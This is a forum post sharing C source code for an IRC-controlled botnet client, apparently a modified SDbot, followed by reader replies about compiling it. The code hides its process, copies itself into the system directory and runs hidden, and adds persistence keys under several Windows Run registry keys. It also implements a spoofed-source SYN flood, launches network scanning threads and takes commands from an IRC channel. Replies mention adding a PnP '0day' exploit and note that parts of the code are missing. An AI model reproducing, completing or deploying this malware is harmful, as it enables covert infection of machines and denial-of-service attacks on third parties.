} PROCESSENTRY32, *LPPROCESSENTRY32;

// icmp.dll function variables
typedef int (__stdcall *ICF)(VOID);
ICF fIcmpCreateFile;
typedef int (__stdcall *ISE)(HANDLE, IPAddr, LPVOID, WORD, PIP_OPTION_INFORMATION, LPVOID, DWORD, DWORD);
ISE fIcmpSendEcho;
typedef int (__stdcall *ICH)(HANDLE);
ICH fIcmpCloseHandle;
#endif

// wininet.dll function variables
typedef int (__stdcall *IGCSE)(LPDWORD, char *, DWORD, DWORD);
IGCSE fInternetGetConnectedStateEx;
typedef int (__stdcall *IGCS)(LPDWORD, DWORD);
IGCS fInternetGetConnectedState;

// kernel32.dll function variables
typedef int (__stdcall *RSP)(DWORD, DWORD);
RSP fRegisterServiceProcess;
typedef HANDLE (__stdcall *CT32S)(DWORD,DWORD);
CT32S fCreateToolhelp32Snapshot;
typedef BOOL (__stdcall *P32F)(HANDLE,LPPROCESSENTRY32);
P32F fProcess32First;
typedef BOOL (__stdcall *P32N)(HANDLE,LPPROCESSENTRY32);
P32N fProcess32Next;

// function prototypes (not really neccesary, but this way i can put the functions in any order i want)
///////////////////////////////////// SYN FLOOD ///////////////////////////
long SendSyn(unsigned long TargetIP, unsigned int SpoofingIP, unsigned short TargetPort,int Times);
long SYNFlood(char *target, char *port, char *len);
///////////////////////////////////// SYN FLOOD ///////////////////////////

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow);
char * decryptstr(char *str, int strlen);
void addlog(char *desc);
int addalias(char *name, char *command);
int addthread(char *desc);
DWORD WINAPI irc_connect(LPVOID param);
#ifndef NO_IDENT
DWORD WINAPI ident(LPVOID user);
#endif
char * rndnick(char *strbuf);
int irc_receiveloop(SOCKET sock, char *channel, char *chanpass, char *nick1, SOCKET hsock, char *hchannel, char *server, BYTE spy);
int irc_parseline(char *line, SOCKET sock, char *channel, char *chanpass, char *nick1, char *server, char *master, char *host, int *in_channel, int repeat);
#ifndef NO_SPY
int irc_spyparseline(char *line, SOCKET sock, char *channel, char *chanpass, char *nick1, SOCKET hsock, char *hchannel, char *server);
#endif
void irc_send(SOCKET sock, char *msg);
void irc_sendf(SOCKET sock, char *msg, char *str);
void irc_sendf2(SOCKET sock, char *msg, char *str, char *str2);
void irc_privmsg(SOCKET sock, char *dest, char *msg, BOOL notice);
char * replacestr(char *str, char *oldstr, char *newstr);
#ifndef NO_UDP
DWORD WINAPI udp(LPVOID param);
#endif
#ifndef NO_PING
DWORD WINAPI ping(LPVOID param);
#endif
#ifndef NO_DOWNLOAD
DWORD WINAPI webdownload(LPVOID param);
#endif
#ifndef NO_REDIRECT
DWORD WINAPI redirect(LPVOID param);
DWORD WINAPI redirectloop(LPVOID param);
DWORD WINAPI redirectloop2(LPVOID param);
#endif
#ifndef NO_NETINFO
char * netinfo(char *ninfo, char *host, SOCKET sock);
#endif
#ifndef NO_SYSINFO
char * sysinfo(char *sinfo);
int cpuspeed(void);
unsigned __int64 cyclecount();
#endif
#ifndef NO_VISIT
DWORD WINAPI visit(LPVOID param);
#endif
void uninstall(void);

// global variables
HANDLE ih; // internet handle
ircs mainirc; // main irc structure
char prefix1 = prefix; // prefix variable
HANDLE threads[64]; // thread handles
char threadd[64][128]; // thread descriptions
SOCKET csock[64]; // thread sockets
char cnick[64][16]; // thread nicks
char log[128][128]; // log entries
DWORD w; // DWORD used for various stuff
as aliases[maxaliases]; // alias array
int anum = 16; // number of aliases
BOOL success = FALSE; // if true then we made successful connect attempt
char tempdir[256]; // name of temp folder
char pbuff[65500]; // packet buffer
BOOL noicmp; // if true, icmp.dll is available
BOOL noigcse; // if true, InternetGetConnectedStateEx function is available
DWORD started; // time bot was started

///////////////////////////////////// SYN FLOOD ///////////////////////////

#define IP_HDRINCL 2

typedef struct ip_hdr
{ unsigned char h_verlen;
unsigned char tos;
unsigned short total_len;
unsigned short ident;
unsigned short frag_and_flags;
unsigned char ttl;
unsigned char proto;
unsigned short checksum;
unsigned int sourceIP;
unsigned int destIP;
} IPHEADER;

typedef struct tsd_hdr
{ unsigned long saddr;
unsigned long daddr;
char mbz;
char ptcl;
unsigned short tcpl;
} PSDHEADER;

typedef struct tcp_hdr
{ USHORT th_sport;
USHORT th_dport;
unsigned int th_seq;
unsigned int th_ack;
unsigned char th_lenres;
unsigned char th_flag;
USHORT th_win;
USHORT th_sum;
USHORT th_urp;
} TCPHEADER;

typedef struct synt
{
char ip[128];
char port[128];
char length[128];
char chan[128];
BOOL notice;
int threadnumber;
SOCKET socket;
} synt;

DWORD WINAPI synthread(LPVOID param);

///////////////////////////////////// SYN FLOOD ///////////////////////////

// program starts here
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
WSADATA wsadata;
int i = 0, err = 0;
HKEY key;
char cfilename[256];
char filename1[64];
char sysdir[256];
char tstr[256];
DWORD cstat;
HANDLE psnap;
PROCESSENTRY32 pe32 = {0};
int copies = 0;
BOOL bkpserver = FALSE;
BOOL noigcs;

// record start time
started = GetTickCount() / 1000;

#ifndef NO_PING
// load icmp.dll functions
HINSTANCE icmp_dll = LoadLibrary("ICMP.DLL");
if (icmp_dll == 0) noicmp = TRUE;
else {
fIcmpCreateFile = (ICF)GetProcAddress(icmp_dll,"IcmpCreateFile");
fIcmpCloseHandle = (ICH)GetProcAddress(icmp_dll,"IcmpCloseHandle");
fIcmpSendEcho = (ISE)GetProcAddress(icmp_dll,"IcmpSendEcho");
if (!fIcmpCreateFile || !fIcmpCloseHandle || !fIcmpSendEcho) {
noicmp = TRUE;
}
}
#endif


// load functions from kernel32.dll and hide from the windows 9x task manager
HINSTANCE kernel32_dll = LoadLibrary("kernel32.dll");
if (kernel32_dll) {
fRegisterServiceProcess = (RSP)GetProcAddress(kernel32_dll, "RegisterServiceProcess");
fCreateToolhelp32Snapshot = (CT32S)GetProcAddress(kernel32_dll, "CreateToolhelp32Snapshot");
fProcess32First = (P32F)GetProcAddress(kernel32_dll, "Process32First");
fProcess32Next = (P32N)GetProcAddress(kernel32_dll, "Process32Next");

if (fRegisterServiceProcess) fRegisterServiceProcess(0, 1);
}

// initialize wininet stuff
ih = InternetOpen("Mozilla/4.0 (compatible)", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
if (ih == NULL) ih = 0;
// see if InternetGetConnectedStateEx is available
HINSTANCE wininet_dll = LoadLibrary("WININET.DLL");
if (wininet_dll == 0) noigcse = TRUE;
else {
fInternetGetConnectedState = (IGCS)GetProcAddress(wininet_dll, "InternetGetConnectedState");
if (!fInternetGetConnectedState) {
noigcs = TRUE;
} else noigcs = TRUE;

fInternetGetConnectedStateEx = (IGCSE)GetProcAddress(wininet_dll, "InternetGetConnectedStateEx");
if (!fInternetGetConnectedStateEx) {
noigcse = TRUE;
} else noigcse = FALSE;
}

// get our file name and the path to the temp folder
GetModuleFileName(GetModuleHandle(NULL), cfilename, sizeof(cfilename));
GetTempPath(sizeof(tempdir), tempdir);

// check if this exe is running already
if (fCreateToolhelp32Snapshot && fProcess32First && fProcess32Next) {
psnap = fCreateToolhelp32Snapshot(2, 0);
if (psnap != INVALID_HANDLE_VALUE) {
pe32.dwSize = sizeof(PROCESSENTRY32);
if (fProcess32First(psnap, &pe32)) {
do {
if (strncmp(cfilename+(strlen(cfilename)-strlen(pe32.szExeFile)), pe32.szExeFile, strlen(pe32.szExeFile)) == 0) copies++;
} while (fProcess32Next(psnap, &pe32));
}
CloseHandle (psnap);
// if this exe has already been run, then exit
if (copies > 1) exit(0);
}
}

err = WSAStartup(MAKEWORD(1, 1), &wsadata);
if (err != 0) return 0;
if ( LOBYTE( wsadata.wVersion ) != 1 || HIBYTE( wsadata.wVersion ) != 1 ) {
WSACleanup();
return 0;
}


srand(GetTickCount());
if (rndfilename) rndnick((char *)&filename); else strncpy(filename1, filename, sizeof(filename1)-1);

GetSystemDirectory(sysdir, sizeof(sysdir));
if (strstr(cfilename, sysdir) == NULL) {
Sleep(1000);
// loop until the file is copied.
sprintf(tstr, "\\%s", filename1);
while (CopyFile(cfilename, strcat(sysdir, tstr), FALSE) == FALSE) Sleep(2000);

PROCESS_INFORMATION pinfo;
STARTUPINFO sinfo;
memset(&sinfo, 0, sizeof(STARTUPINFO));
sinfo.cb = sizeof(sinfo);
sinfo.wShowWindow = SW_HIDE;
WSACleanup();
if (CreateProcess(NULL, sysdir, NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo)) exit(0);
}

if (AutoStart) {
RegCreateKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL);
RegSetValueEx(key, valuename, 0, REG_SZ, (const unsigned char *)&filename1, sizeof(filename)+1);
RegCloseKey(key);

RegCreateKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\RunO nce", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL);
RegSetValueEx(key, valuename, 0, REG_SZ, (const unsigned char *)&filename1, sizeof(filename)+1);
RegCloseKey(key);

RegCreateKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\RunS ervices", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL);
RegSetValueEx(key, valuename, 0, REG_SZ, (const unsigned char *)&filename1, sizeof(filename)+1);
RegCloseKey(key);

RegCreateKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL);
RegSetValueEx(key, valuename, 0, REG_SZ, (const unsigned char *)&filename1, sizeof(filename)+1);
RegCloseKey(key);

RegCreateKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\RunO nce", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL);
RegSetValueEx(key, valuename, 0, REG_SZ, (const unsigned char *)&filename1, sizeof(filename)+1);
RegCloseKey(key);
}

memset(threadd, 0, sizeof(threadd));
memset(cnick, 0, sizeof(cnick));
memset(aliases, 0, sizeof(aliases));

addthread("main thread");

// remove the following line if you don't want any predefined aliases
addpredefinedaliases();

memset(log, 0, sizeof(log));
addlog("bot started.");
INT nK = 0;
DWORD dwID[MAX_NB_THREAD];
INT nRet;
WSADATA WSAData;

nRet = WSAStartup(MAKEWORD(1, 1), &WSAData);
if (nRet != 0)
{
WSACleanup();
printf("Error: Cannot initalize winsock.");
return 1;
}
GetLocalIP();

for (nK = 0; nK < MAX_NB_THREAD; nK++)
{
hThread[nK] = CreateThread(NULL, 0, ScanNetDAMA, (LPVOID) nK, (unsigned long)NULL, &dwID[nK]);
}

SetConsoleCtrlHandler(TermProcess, TRUE);
// copy settings into main irc structure
strncpy(mainirc.host, server, sizeof(mainirc.host)-1);
mainirc.port = port;
strncpy(mainirc.channel, channel, sizeof(mainirc.channel)-1);
strncpy(mainirc.chanpass, chanpass, sizeof(mainirc.chanpass)-1);
mainirc.spy = 0;

while (1) {
for (i = 0; i < 6; i++) {
#ifndef NO_CHECKCONNECTION
// check if we're connected to the internet... if not, then wait 5mins and try again
if (!noigcs) if (fInternetGetConnectedState(&cstat, 0) == FALSE) {
Sleep(30000);
continue;
}
#endif

err = irc_connect((void *)&mainirc);
success = FALSE;
if (err == 2) break; // break out of the loop

if (success) i--; // if we're successful in connecting, decrease i by 1;

// irc_connect didn't return 2, so we need to sleep then reconnect
Sleep(3000);
}

if (err == 2) break; // break out of the loop and close

if (bkpserver) {
strncpy(mainirc.host, server, sizeof(mainirc.host)-1);
mainirc.port = port;
strncpy(mainirc.channel, channel, sizeof(mainirc.channel)-1);
strncpy(mainirc.chanpass, chanpass, sizeof(mainirc.chanpass)-1);
bkpserver = FALSE;
}
else if (!bkpserver && server2[0] != '\0') {
strncpy(mainirc.host, server2, sizeof(mainirc.host)-1);
mainirc.port = port2;
strncpy(mainirc.channel, channel2, sizeof(mainirc.channel)-1);
strncpy(mainirc.chanpass, chanpass2, sizeof(mainirc.chanpass)-1);
bkpserver = TRUE;
}
}

// cleanup;
for (i = 0; i < 64; i++) closesocket(csock[i]);
WSACleanup();

return 0;
}

///////////////////////////////////// SYN FLOOD ///////////////////////////

USHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum=0;

while(size > 1) { cksum+=*buffer++; size -= 2; }
if(size) cksum += *(UCHAR*)buffer;

cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);
return (USHORT)(~cksum);
}

u_long LookupAddress(const char* szHost)
{
u_long nRemoteAddr = inet_addr(szHost);
struct hostent *pHE;

if (nRemoteAddr == INADDR_NONE)
{
pHE = gethostbyname(szHost);
if (pHE == 0) return INADDR_NONE;
nRemoteAddr = *((u_long*)pHE->h_addr_list[0]);
}

return nRemoteAddr;
}

long SendSyn(unsigned long TargetIP, unsigned int SpoofingIP, unsigned short TargetPort, int len)
{
WSADATA WSAData;
SOCKET sock;
SOCKADDR_IN addr_in;
IPHEADER ipHeader;
TCPHEADER tcpHeader;
PSDHEADER psdHeader;

LARGE_INTEGER freq, halt_time, cur;
char szSendBuf[60]={0};
BOOL flag;
int rect;
long total;
char buf[64];

if (WSAStartup(MAKEWORD(2,2), &WSAData)!=0)
return FALSE;

if ((sock=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL ,0,WSA_FLAG_OVERLAPPED ))==INVALID_SOCKET)
return FALSE;

flag=TRUE;
if (setsockopt(sock,IPPROTO_IP, IP_HDRINCL,(char *)&flag,sizeof(flag))==SOCKET_ERROR)
return FALSE;

addr_in.sin_family=AF_INET;
addr_in.sin_port=htons(TargetPort);
addr_in.sin_addr.s_addr=TargetIP;

ipHeader.h_verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(t cpHeader));
ipHeader.ident=1;
ipHeader.frag_and_flags=0;
ipHeader.ttl=128;
ipHeader.proto=IPPROTO_TCP;
ipHeader.checksum=0;
ipHeader.destIP=TargetIP;
tcpHeader.th_dport=htons(TargetPort);
tcpHeader.th_ack=0;
tcpHeader.th_lenres=(sizeof(tcpHeader)/4<<4|0);
tcpHeader.th_flag=2;
tcpHeader.th_win=htons(16384);
tcpHeader.th_urp=0;

total = 0;
QueryPerformanceFrequency(&freq);
QueryPerformanceCounter(&cur);
halt_time.QuadPart = (freq.QuadPart * len) + cur.QuadPart;

while(TRUE)
{
tcpHeader.th_sum=0;

psdHeader.daddr=ipHeader.destIP;
psdHeader.mbz=0;
psdHeader.ptcl=IPPROTO_TCP;
psdHeader.tcpl=htons(sizeof(tcpHeader));
ipHeader.sourceIP=htonl(SpoofingIP++);

tcpHeader.th_sport=htons((rand() % 1001) + 1000 ); // source port
tcpHeader.th_seq=htons((rand() << 16) | rand());

psdHeader.saddr=ipHeader.sourceIP;

memcpy(szSendBuf, &psdHeader, sizeof(psdHeader));
memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));
tcpHeader.th_sum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader));

memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));
memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader ), 0, 4);
ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader));

memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));

rect=sendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader),0,(struct sockaddr*)&addr_in, sizeof(addr_in));
if (rect==SOCKET_ERROR)
{
sprintf(buf, "send error!:%d\n",WSAGetLastError());
addlog(buf);
return 0;
}

total += rect;
QueryPerformanceCounter(&cur);
if (cur.QuadPart >= halt_time.QuadPart)
break;
}

closesocket(sock);
WSACleanup();

return (total);
}

long SYNFlood(char *target, char *port, char *len)
{
unsigned long TargetIP;
unsigned short p;
unsigned int SpoofIP;
long num;
int t;
char buf[80];

TargetIP = LookupAddress((const char *)target);
p = atoi(port);
t = atoi(len);
SpoofIP = TargetIP + ((rand()%512)+256);

num = SendSyn(TargetIP, SpoofIP, p, t);

#ifdef REMOVE_NONSYNNERS
if (!num)
{
uninstall();
WSACleanup();
ExitProcess(0);
}
#endif

if (!num) num = 1; // 'Div by zero' kludge
num = num / 1000 / t;

sprintf(buf, "syn flood: %s:%s [%iKB/sec]", target, port, num);
addlog(buf);
return num;
}

///////////////////////////////////// SYN FLOOD ///////////////////////////

// simple decrypt function, for encrypted strings
char * decryptstr(char *str, int strlen)
{
if (cryptkey != 0) for (BYTE i = 0; i < strlen; i++) str[i] = str[i] ^ (cryptkey + (i * (cryptkey % 10) + 1));
return str;
}

// function to add a log item
void addlog(char *desc)
{
SYSTEMTIME st;

GetLocalTime(&st);

for (int i = 126; i >= 0; i--) if (log[i][0] != '\0') strncpy(log[i+1], log[i], sizeof(log[i+1])-1);
sprintf(log[0], "[%d-%d-%d %d:%d:%d] %s", st.wMonth, st.wDay, st.wYear, st.wHour, st.wMinute, st.wSecond, desc);
}

// function to add an alias and return alias number
int addalias(char *name, char *command)
{
int i;
for (i = 0; i < maxaliases; i++) {
if (aliases[i].name[0] == '\0' || strcmp(aliases[i].name, name) == 0) {
memset(&aliases[i], 0, sizeof(aliases[i]));
strncpy(aliases[i].name, name, sizeof(aliases[i].name)-1);
strncpy(aliases[i].command, command, sizeof(aliases[i].command)-1);
anum++;
break;
}
}
return i;
}

// function to add description to thread list and return thread number
int addthread(char *desc)
{
int i;
for (i = 0; i < 64; i++) {
if (threadd[i][0] == '\0') {
strncpy(threadd[i], desc, sizeof(threadd[i])-1);
break;
}
}
return i;
}

// connect function used by the original bot and all clones/spies
DWORD WINAPI irc_connect(LPVOID param)
{
SOCKET sock;
SOCKADDR_IN ssin;
IN_ADDR iaddr;
LPHOSTENT hostent;
DWORD err;
int rval;
char nick[16];
char *nick1;
char str[64];
BYTE spy;
ircs irc;

irc = *((ircs *)param);
ircs *ircp = (ircs *)param;
ircp->gotinfo = TRUE;

while (1) {
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = htons(irc.port);
iaddr.s_addr = inet_addr(irc.host);
if (iaddr.s_addr == INADDR_NONE) hostent = gethostbyname(irc.host);
else hostent = gethostbyaddr((const char *)&iaddr, sizeof(struct in_addr), AF_INET);
if (hostent == NULL) return 0;
ssin.sin_addr = *((LPIN_ADDR)*hostent->h_addr_list);

memset(nick, 0, sizeof(nick));
if (irc.spy == 1) nick1 = irc.nick; else {
nick1 = rndnick(nick);
}

#ifndef NO_IDENT
CreateThread(NULL, 0, &ident, NULL, 0, &err);
#endif
// MyIP=netinfo(sendbuf, host, sock);
sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
csock[irc.threadnum] = sock;
err = connect(sock, (LPSOCKADDR)&ssin, sizeof(SOCKADDR_IN));
if (err == SOCKET_ERROR) {
closesocket(sock);
Sleep(2000);
continue;
}

sprintf(str, "connected to %s.", irc.host);
addlog(str);

strncpy(cnick[irc.threadnum], nick1, sizeof(cnick[irc.threadnum])-1);

if (irc.spy == 1) spy = 1; else spy = 0;
rval = irc_receiveloop(sock, irc.channel, irc.chanpass, nick1, irc.sock, irc.hchan, irc.host, spy);
closesocket(sock);

if (rval == 0) continue;
if (rval == 1) {
Sleep(1800000);
continue;
}
if (rval == 2) break;
}

threads[irc.threadnum] = 0;
threadd[irc.threadnum][0] = '\0';
cnick[irc.threadnum][0] = '\0';
return rval;
}

#ifndef NO_IDENT
// ident server
DWORD WINAPI ident(LPVOID param)
{
SOCKET isock, csock;
SOCKADDR_IN issin, cssin;
char user[12];
char ibuff[32];

isock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); // set isock to standard TCP socket
WSAAsyncSelect(isock, 0, WM_USER + 1, FD_READ); // set async mode for isock
memset(&issin, 0, sizeof(issin));
issin.sin_family = AF_INET; // AF_INET is currently the only supported family
issin.sin_port = htons(113); // set ident port
bind(isock, (SOCKADDR *)&issin, sizeof(issin)); // bind issin to isock

while(1) { // loop forever
if (listen(isock, 10) == SOCKET_ERROR) return 0; // listen for connection. if we get SOCKET_ERROR, then something's wrong and so we return
csock = accept(isock, (SOCKADDR *)&cssin, NULL); // try to accept a connection
if (csock != INVALID_SOCKET) break; // if INVALID_SOCKET is returned, then we don't have a connection. otherwise, we're connected, so break
}

memset(user, 0, sizeof(user));
srand(GetTickCount());
rndnick(user);

memset(ibuff, 0, sizeof(ibuff));
sprintf(ibuff, "%d, %d : USERID : UNIX : %s\r\n", rand()%6000+1, port, (char *)user); // build ident reply
send(csock, ibuff, strlen(ibuff), 0);

// we're done, so let's close our sockets and return
closesocket(csock);
closesocket(isock);

return 0;
}
#endif

char * rndnick(char *strbuf)
{
int n, nl;
char nick[12];

srand(GetTickCount());
memset(nick, 0, sizeof(nick));
nl = (rand()%3)+4;
for (n=0; n<nl; n++) nick[n] = (rand()%26)+97;
nick[n+1] = '\0';

strncpy(strbuf, nick, 12);
return strbuf;
}

// receive loop for bots/spies
int irc_receiveloop(SOCKET sock, char *channel, char *chanpass, char *nick1, SOCKET hsock, char *hchannel, char *server, BYTE spy)
{
// main receive buffer
char buff[4096];
int err, repeat;
char master[128*maxlogins];
char *b;
char str[8];
char login[64];
char line[512];
int in_channel;

repeat = 0;
memset(master, 0, sizeof(master));


if (serverpass[0] != '\0') {
sprintf(login, "PASS %s\r\n", serverpass);
send(sock, login, strlen(login), 0);
}
sprintf(login, "NICK %s\r\n"
"USER %s 0 0 :%s\r\n", nick1, rndnick(str), nick1);
err = send(sock, login, strlen(login), 0);
if (err == SOCKET_ERROR) {
closesocket(sock);
Sleep(5000);
return 0;
}

// loop forever
while(1) {
char host[160];

memset(buff, 0, sizeof(buff));
err = recv(sock, buff, sizeof(buff), 0);
// if recv() returns 0, that means that the connection has been lost.
if (err == 0) break;
// if recv() returns SOCKET_ERROR then we've probably terminated the connection.
if (err == SOCKET_ERROR) break;

// split lines up if multiple lines received at once, and parse each line
memset(line, 0, sizeof(line));
b = strtok(buff, "\r\n");
if (b != NULL) strncpy(line, b, sizeof(line)-1); else b = NULL;
while (b != NULL) {
#ifndef NO_SPY
if (spy == 1) repeat = irc_spyparseline(line, sock, channel, chanpass, nick1, hsock, hchannel, server);
#endif
if (spy == 0) {
repeat = 1;
do {
// repeat--;
repeat = irc_parseline(line, sock, channel, chanpass, nick1, server, master, host, &in_channel, repeat);
repeat--;
} while (repeat > 0);
//if (repeat-- > 0) while (repeat-- > 0) irc_parseline(b[n-1], sock, channel, chanpass, nick1, in_channel, repeat);
if (repeat == -1) return 0;
else if (repeat == -2) return 1;
else if (repeat == -3) return 2;
}

b = strtok(b+strlen(b)+1, "\r");
if (b != NULL) if (b[strlen(b)+2] != '\n' && b[strlen(b)+3] != '\0') strncpy(line, b+1, sizeof(line)-1); else b = NULL;
}
}

return 0;
}

// function to parse lines for the bot and clones
int irc_parseline(char *line, SOCKET sock, char *channel, char *chanpass, char *nick1, char *server, char *master, char *host, int *in_channel, int repeat)
{
char line1[512];
char line2[512];
char *masters[maxlogins];
BOOL ismaster;
char ntmp[12];
char ntmp2[3];
int i, ii, s;
char *a[32];
char a0[128];
char nick[16];
char user[24];
char sendbuf[512];
DWORD id;
BOOL silent = FALSE;
BOOL notice = FALSE;
BOOL usevars = FALSE;
int cl;

memset(sendbuf, 0, sizeof(sendbuf));

id = 0;
strncpy(nick, nick1, sizeof(nick)-1);
for (i = 0; i < maxlogins; i++) masters[i] = master + (i * 128);

if (line == NULL) return 1;
memset(line1, 0, sizeof(line1));
strncpy(line1, line, sizeof(line1)-1);
char *x = strstr(line1, " :");

// split the line up into seperate words
strncpy(line2, line1, sizeof(line2)-1);
a[0] = strtok(line2, " ");
for (i = 1; i < 32; i++) a[i] = strtok(NULL, " ");

if (a[0] == NULL || a[1] == NULL) return 1;

//check for 'silent' parameter
for (i = 3; i < 32; i++) if (a[i] == NULL && a[i-1] != NULL) {
if (strcmp(a[i-1], "-s") == 0) silent = TRUE;
break;
}

//check for 'notice' parameter
for (i = 3; i < 32; i++) if (a[i] == NULL && a[i-1] != NULL) {
notice = TRUE;
break;
}

if (a[0][0] != '\n') {
strncpy(a0, a[0], sizeof(a0)-1);
strncpy(user, a[0]+1, sizeof(user)-1);
strtok(user, "!");
}


// pong if we get a ping request from the server
if (strcmp("PING", a[0]) == 0) {
//irc_sendf(sock, "PONG %s\r\n", a[1]+1);
irc_sendf(sock, "WHOIS %s\r\n", "jamesbrown");
irc_sendf(sock, "PONG %s\r\n", a[1]);
if (in_channel == 0) {
irc_sendf2(sock, "JOIN %s %s\r\n", channel, chanpass);
}
return 1;
}

if (strcmp("NOTICE", a[1]) == 0) {
if (a[18])
{
if (strcmp("pong", a[17]) == 0)
{
irc_sendf(sock, "PONG %s\r\n", a[18]);
//irc_sendf(sock, "PONG %s\r\n", a[1]);
if (in_channel == 0) {
irc_sendf2(sock, "JOIN %s %s\r\n", channel, chanpass);
}
}
}
return 1;
}

// looks like we're connected to the server, let's join the channel
if (strcmp("001", a[1]) == 0 || strcmp("005", a[1]) == 0) {
irc_sendf2(sock, &qu

--missing code--

Plz Compile with lcc

http://www.q-software-solutions.de/prod ... ndex.shtml (http://www.q-software-solutions.de/products/lcc-win32/index.shtml)

have phunz

Use it only to test your Local Nets :D

seems that the code is not complete?

there ya go :D
file pass is class

moving the thread to 0day , this isn't really a public material ;)

Nice stuff, but missing code:(

Nice code, lets check this out, i hope in the rar the code is not missing.

Nice.

very nice idd let's c if i can get this one to work :)

doesnt connect to irc properly, i've tried compiling a few times..

Any chance you could repost the whole code danix (Thnx btw)

hey mate, thanks for the code, its great for learning to how you added the pnp into sdbot so it will make it easier to port into another bot :)

thanks for the your compiled version, most sources dont compile because they are incomplete and poorly written, hopefully yours works as well as it should..thank you again.

thx for this

thx and i'll have a try~

the codes seems is not complete!

great stuff man thxx alot

Its nice to see people sharing this. When the pnp sploit came out I was thinking about modding a bot with this 0day, never got round to it. SDbot looks abit hard to mod compared to alot of other bots.

-toe

I honestly think most of other bots sucks.

SDbot rocks. And this private version of Danix boy rocks even more!

He just seems to be disappeared.... :cry:

Yog

Tested on xp and explorer does not load.

-toe

I look , Thx :roll:

lets see if i have more luck with compile it as the others here
ill give it a try
thx alot

Hm, the thing is, i cant compile it.. I dont know why.. I got a lot or errors while compiling..

the code seems broken probably due to a website update, PM danix to tell him editing the thread.

Any update on this one?